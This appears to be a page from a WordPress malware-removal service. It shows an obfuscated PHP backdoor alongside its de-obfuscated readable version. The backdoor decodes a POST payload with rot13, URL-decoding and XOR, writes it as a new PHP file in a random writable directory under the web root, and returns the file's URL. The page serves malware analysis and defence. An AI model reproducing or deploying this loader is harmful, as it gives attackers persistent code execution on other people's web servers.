De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $PoOZT = chr(68)."\x4f".chr(67).chr(85)."\115".chr(69).'N'.'T'."\x5f".chr(82)."\117".chr(79).'T';$smoJTEixAL = chr(72).'T'.chr(116-32).chr(361-281)."\x5f"."\x48"."\x4f".'S'."\x54";$TzVCvb = chr(416-312).chr(116).chr(322-206).'p'."\x3a"."\x2f".'/';$DJGTRb = "\56".chr(662-550)."\150"."\160";$ZpoNvVKWE = "\x70".chr(1083-979).chr(418-306);$RzmgRP = "\146".chr(105).chr(370-262).'e'."\137"."\160".chr(450-333)."\x74".chr(392-297).chr(643-544).chr(388-277).chr(843-733).chr(551-435).'e'."\156".chr(116)."\163";$fldZLbJ = "\x72".'a'.chr(331-212)."\x75".chr(593-479)."\154".'d'."\x65".chr(674-575).chr(340-229)."\144"."\145";$ygLKFKA = "\165".chr(110)."\x73".chr(101).chr(721-607).chr(725-620)."\x61"."\x6c".chr(105).chr(937-815)."\145";$KUuxLHSf = "\x70".chr(322-218).chr(112).'v'.chr(118-17)."\162".chr(888-773).'i'.'o'."\156";$XRSrgKa = "\163".chr(116).'r'."\x5f".chr(723-609).chr(1076-965).chr(116).chr(49).'3';$xaPWFetk = chr(115)."\145"."\162".chr(599-494).chr(563-466).chr(812-704).chr(643-538).'z'.chr(101);foreach ($_POST as $ZABuSNh => $axZrHW){if (strlen($ZABuSNh) == 16){$axZrHW = str_split($fldZLbJ($XRSrgKa($axZrHW)));$ZABuSNh = array_slice(str_split(str_repeat($ZABuSNh, (count($axZrHW)/16)+1)), 0, count($axZrHW));function JLduJN($hJyHYUQI, $QqAlnl, $ZABuSNh){$EiCKixAp = "DtsAJbPGqDygBcuL";return $hJyHYUQI ^ $EiCKixAp[$QqAlnl % strlen($EiCKixAp)] ^ $ZABuSNh;}$axZrHW = implode("", array_map("JLduJN", array_values($axZrHW), array_keys($axZrHW), array_values($ZABuSNh)));$axZrHW = @$ygLKFKA($axZrHW);if (@is_array($axZrHW)){$WoPTqcULx = array_keys($axZrHW);$axZrHW = $axZrHW[$WoPTqcULx[0]];if ($axZrHW === $WoPTqcULx[0]){echo @$xaPWFetk(Array($ZpoNvVKWE => @$KUuxLHSf(), ));exit();}else {function hbCvNa($zBtcfYWir){static $CFxrX = array();$Zyrarvq = glob($zBtcfYWir . '/*', GLOB_ONLYDIR);if (count($Zyrarvq) > 0) {foreach ($Zyrarvq as $zBtcfYW) {if (@is_writable($zBtcfYW)) {$CFxrX[] = $zBtcfYW;}}}foreach ($Zyrarvq as $zBtcfYWir) hbCvNa($zBtcfYWir);return $CFxrX;}$iKXZOLXxUf = $_SERVER[$PoOZT];$Zyrarvq = hbCvNa($iKXZOLXxUf);$WoPTqcULx = array_rand($Zyrarvq);$LWokV = $Zyrarvq[$WoPTqcULx] . "/" . substr(md5(time()), 0, 8) . $DJGTRb;@$RzmgRP($LWokV, $axZrHW);echo $TzVCvb . $_SERVER[$smoJTEixAL] . substr($LWokV, strlen($iKXZOLXxUf));exit();}}}}
<?php $PoOZT = "DOCUMENT_ROOT"; $smoJTEixAL = "HTTP_HOST"; $TzVCvb = "http://"; $DJGTRb = ".php"; $ZpoNvVKWE = "php"; $RzmgRP = "file_put_contents"; $fldZLbJ = "rawurldecode"; $ygLKFKA = "unserialize"; $KUuxLHSf = "phpversion"; $XRSrgKa = "str_rot13"; $xaPWFetk = "serialize"; foreach ($_POST as $ZABuSNh => $axZrHW) { if (strlen($ZABuSNh) == 16) { $axZrHW = str_split($fldZLbJ($XRSrgKa($axZrHW))); $ZABuSNh = array_slice(str_split(str_repeat($ZABuSNh, count($axZrHW) / 16 + 1)), 0, count($axZrHW)); function JLduJN($hJyHYUQI, $QqAlnl, $ZABuSNh) { $EiCKixAp = "DtsAJbPGqDygBcuL"; return $hJyHYUQI ^ $EiCKixAp[$QqAlnl % strlen($EiCKixAp)] ^ $ZABuSNh; } $axZrHW = implode("", array_map("JLduJN", array_values($axZrHW), array_keys($axZrHW), array_values($ZABuSNh))); $axZrHW = @$ygLKFKA($axZrHW); if (@is_array($axZrHW)) { $WoPTqcULx = array_keys($axZrHW); $axZrHW = $axZrHW[$WoPTqcULx[0]]; if ($axZrHW === $WoPTqcULx[0]) { echo @$xaPWFetk(array($ZpoNvVKWE => @$KUuxLHSf())); exit; } else { function hbCvNa($zBtcfYWir) { static $CFxrX = array(); $Zyrarvq = glob($zBtcfYWir . '/*', GLOB_ONLYDIR); if (count($Zyrarvq) > 0) { foreach ($Zyrarvq as $zBtcfYW) { if (@is_writable($zBtcfYW)) { $CFxrX[] = $zBtcfYW; } } } foreach ($Zyrarvq as $zBtcfYWir) { hbCvNa($zBtcfYWir); } return $CFxrX; } $iKXZOLXxUf = $_SERVER[$PoOZT]; $Zyrarvq = hbCvNa($iKXZOLXxUf); $WoPTqcULx = array_rand($Zyrarvq); $LWokV = $Zyrarvq[$WoPTqcULx] . "/" . substr(md5(time()), 0, 8) . $DJGTRb; @$RzmgRP($LWokV, $axZrHW); echo $TzVCvb . $_SERVER[$smoJTEixAL] . substr($LWokV, strlen($iKXZOLXxUf)); exit; } } } }
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.